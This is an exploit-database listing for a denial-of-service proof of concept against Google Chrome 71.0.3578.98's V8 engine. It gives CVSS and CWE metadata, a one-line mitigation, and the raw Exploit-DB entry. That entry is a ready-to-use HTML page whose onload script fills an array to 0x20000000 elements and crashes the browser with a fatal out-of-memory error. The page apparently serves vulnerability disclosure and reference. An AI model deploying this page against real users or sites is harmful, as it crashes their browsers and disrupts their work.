header-logo
Suggest Exploit
vendor:
Chrome
by:
Bogdan Kurinnoy
7.5
CVSS
HIGH
Out-of-memory in invalid array length
119
CWE
Product Name: Chrome
Affected Version From: Google Chrome 71.0.3578.98
Affected Version To: Google Chrome 71.0.3578.98
Patch Exists: NO
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows x64
2019

Google Chrome 71.0.3578.98 V8 JavaScript Engine – Out-of-memory in invalid array length. Denial of Service (PoC)

Fatal javascript OOM in invalid array length. A proof-of-concept exploit is provided which creates an array with a length of 0x20000000, which causes a fatal out-of-memory error in the V8 JavaScript engine.

Mitigation:

The vulnerability can be mitigated by ensuring that the length of an array is valid before it is used.
Source

Exploit-DB raw data:

<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory in invalid array length. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-01-10
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid array length

# https://bugs.chromium.org/p/v8/issues/detail?id=8668
-->


<html>
<head>
<script>

function main() {

var ar = [];

	for(let i = 0; i < 0x20000000; ++i){
		ar[i]=i;
	} 
}
</script>
</head>
<body onload=main()></body>
</html>

Navigation

Suggest Exploit

Services By CQR